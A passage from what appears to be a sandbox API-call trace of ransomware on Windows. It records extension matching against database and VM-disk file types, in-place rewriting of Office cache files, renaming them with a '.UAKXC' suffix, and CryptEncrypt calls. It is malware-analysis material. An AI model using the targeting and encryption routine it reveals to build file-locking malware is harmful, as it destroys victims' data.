Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".usr") returned 0x0 [0154.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".v12") returned 0x0 [0154.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".vis") returned 0x0 [0154.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".vpd") returned 0x0 [0154.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".vvv") returned 0x0 [0154.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".wdb") returned 0x0 [0154.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".wmdb") returned 0x0 [0154.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".wrk") returned 0x0 [0154.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".xdb") returned 0x0 [0154.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".xld") returned 0x0 [0154.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".xmlff") returned 0x0 [0154.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".abcddb") returned 0x0 [0154.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".abs") returned 0x0 [0154.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".abx") returned 0x0 [0154.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".accdw") returned 0x0 [0154.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".adn") returned 0x0 [0154.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".db2") returned 0x0 [0154.565] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".fm5") returned 0x0 [0154.565] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".hjt") returned 0x0 [0154.565] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".icg") returned 0x0 [0154.565] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".icr") returned 0x0 [0154.565] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".kdb") returned 0x0 [0154.565] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".lut") returned 0x0 [0154.566] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".maw") returned 0x0 [0154.566] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".mdn") returned 0x0 [0154.566] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".mdt") returned 0x0 [0154.566] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".vdi") returned 0x0 [0154.566] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".vhd") returned 0x0 [0154.566] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".vmdk") returned 0x0 [0154.566] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".pvm") returned 0x0 [0154.566] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".vmem") returned 0x0 [0154.566] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".vmsn") returned 0x0 [0154.566] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".vmsd") returned 0x0 [0154.566] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".nvram") returned 0x0 [0154.566] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".vmx") returned 0x0 [0154.566] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".raw") returned 0x0 [0154.566] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".qcow2") returned 0x0 [0154.566] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".subvol") returned 0x0 [0154.566] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".bin") returned 0x0 [0154.566] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".vsv") returned 0x0 [0154.566] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".avhd") returned 0x0 [0154.566] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".vmrs") returned 0x0 [0154.566] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".vhdx") returned 0x0 [0154.566] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".avdx") returned 0x0 [0154.566] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".vmcx") returned 0x0 [0154.567] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".iso") returned 0x0 [0154.567] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.567] WriteFile (in: hFile=0x6f0, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0154.754] WriteFile (in: hFile=0x6f0, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 1 [0154.754] SetEndOfFile (hFile=0x6f0) returned 1 [0154.754] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.755] ReadFile (in: hFile=0x6f0, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x42d7c2, lpNumberOfBytesRead=0x397fc80, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc80*=0x42d7c2, lpOverlapped=0x0) returned 1 [0155.258] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0xffbd283e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.258] WriteFile (in: hFile=0x6f0, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0x42d7c2, lpNumberOfBytesWritten=0x397fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc2c*=0x42d7c2, lpOverlapped=0x0) returned 1 [0156.172] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x42d7c2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.172] ReadFile (in: hFile=0x6f0, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x42d7c2, lpNumberOfBytesRead=0x397fc80, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc80*=0x42d7c2, lpOverlapped=0x0) returned 1 [0157.055] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0xffbd283e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.055] WriteFile (in: hFile=0x6f0, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0x42d7c2, lpNumberOfBytesWritten=0x397fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc2c*=0x42d7c2, lpOverlapped=0x0) returned 1 [0157.292] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x42d7c2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.292] ReadFile (in: hFile=0x6f0, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x42d7c2, lpNumberOfBytesRead=0x397fc80, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc80*=0x42d7c2, lpOverlapped=0x0) returned 1 [0158.062] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0xffbd283e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.062] WriteFile (in: hFile=0x6f0, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0x42d7c2, lpNumberOfBytesWritten=0x397fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc2c*=0x42d7c2, lpOverlapped=0x0) returned 1 [0158.617] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x42d7c2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.617] ReadFile (in: hFile=0x6f0, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x42d7c2, lpNumberOfBytesRead=0x397fc80, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc80*=0x42d7c2, lpOverlapped=0x0) returned 1 [0159.235] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0xffbd283e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.235] WriteFile (in: hFile=0x6f0, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0x42d7c2, lpNumberOfBytesWritten=0x397fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc2c*=0x42d7c2, lpOverlapped=0x0) returned 1 [0159.627] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x42d7c2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.627] ReadFile (in: hFile=0x6f0, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x42d7c2, lpNumberOfBytesRead=0x397fc80, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc80*=0x42d7c2, lpOverlapped=0x0) returned 1 [0159.696] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0xffbd283e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.696] WriteFile (in: hFile=0x6f0, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0x42d7c2, lpNumberOfBytesWritten=0x397fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc2c*=0x42d7c2, lpOverlapped=0x0) returned 1 [0159.974] CloseHandle (hObject=0x6f0) returned 1 [0161.026] GetProcessHeap () returned 0xea0000 [0161.026] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77970d0 [0161.026] lstrcpyW (in: lpString1=0x77970d0, lpString2="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" [0161.026] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpString2=".UAKXC" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.UAKXC") returned="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.UAKXC" [0161.026] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.UAKXC" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.uakxc")) returned 1 [0161.027] GetProcessHeap () returned 0xea0000 [0161.027] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77970d0 | out: hHeap=0xea0000) returned 1 [0161.027] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5c08 | out: hHeap=0xea0000) returned 1 [0161.027] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef3230 | out: hHeap=0xea0000) returned 1 [0161.027] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0161.027] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0161.027] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0161.028] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml")) returned 0x2020 [0161.028] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f0 [0161.028] GetLastError () returned 0x0 [0161.029] GetFileSizeEx (in: hFile=0x6f0, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=1606) returned 1 [0161.029] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".4dd") returned 0x0 [0161.029] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".4dl") returned 0x0 [0161.029] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".accdb") returned 0x0 [0161.029] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".accdc") returned 0x0 [0161.029] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".accde") returned 0x0 [0161.029] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".accdr") returned 0x0 [0161.029] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".accdt") returned 0x0 [0161.029] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".accft") returned 0x0 [0161.029] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".adb") returned 0x0 [0161.029] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".ade") returned 0x0 [0161.029] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".adf") returned 0x0 [0161.029] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".adp") returned 0x0 [0161.029] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".arc") returned 0x0 [0161.029] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".ora") returned 0x0 [0161.029] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".alf") returned 0x0 [0161.029] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".ask") returned 0x0 [0161.029] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".btr") returned 0x0 [0161.029] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".bdf") returned 0x0 [0161.029] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".cat") returned 0x0 [0161.029] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".cdb") returned 0x0 [0161.029] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".ckp") returned 0x0 [0161.029] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".cma") returned 0x0 [0161.029] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".cpd") returned 0x0 [0161.029] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".dacpac") returned 0x0 [0161.029] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".dad") returned 0x0 [0161.030] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".dadiagrams") returned 0x0 [0161.030] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".daschema") returned 0x0 [0161.030] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".db") returned 0x0 [0161.030] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".db-shm") returned 0x0 [0161.030] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".db-wal") returned 0x0 [0161.030] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".db3") returned 0x0 [0161.030] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".dbc") returned 0x0 [0161.030] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".dbf") returned 0x0 [0161.030] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".dbs") returned 0x0 [0161.030] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".dbt") returned 0x0 [0161.030] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".dbv") returned 0x0 [0161.030] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".dbx") returned 0x0 [0161.030] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".dcb") returned 0x0 [0161.030] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".dct") returned 0x0 [0161.030] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".dcx") returned 0x0 [0161.030] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".ddl") returned 0x0 [0161.030] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".dlis") returned 0x0 [0161.030] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".dp1") returned 0x0 [0161.030] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".dqy") returned 0x0 [0161.030] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".dsk") returned 0x0 [0161.030] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".dsn") returned 0x0 [0161.030] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".dtsx") returned 0x0 [0161.030] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".dxl") returned 0x0 [0161.030] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".eco") returned 0x0 [0161.030] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".ecx") returned 0x0 [0161.030] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".edb") returned 0x0 [0161.031] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".epim") returned 0x0 [0161.031] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".exb") returned 0x0 [0161.031] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".fcd") returned 0x0 [0161.031] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".fdb") returned 0x0 [0161.031] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".fic") returned 0x0 [0161.031] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".fmp") returned 0x0 [0161.031] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".fmp12") returned 0x0 [0161.031] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".fmpsl") returned 0x0 [0161.031] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".fol") returned 0x0 [0161.031] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".fp3") returned 0x0 [0161.031] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".fp4") returned 0x0 [0161.031] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".fp5") returned 0x0 [0161.031] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".fp7") returned 0x0 [0161.031] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".fpt") returned 0x0 [0161.031] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".frm") returned 0x0 [0161.031] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".gdb") returned 0x0 [0161.031] StrStrIW (lpFirst="C:\\MSOCache\\All 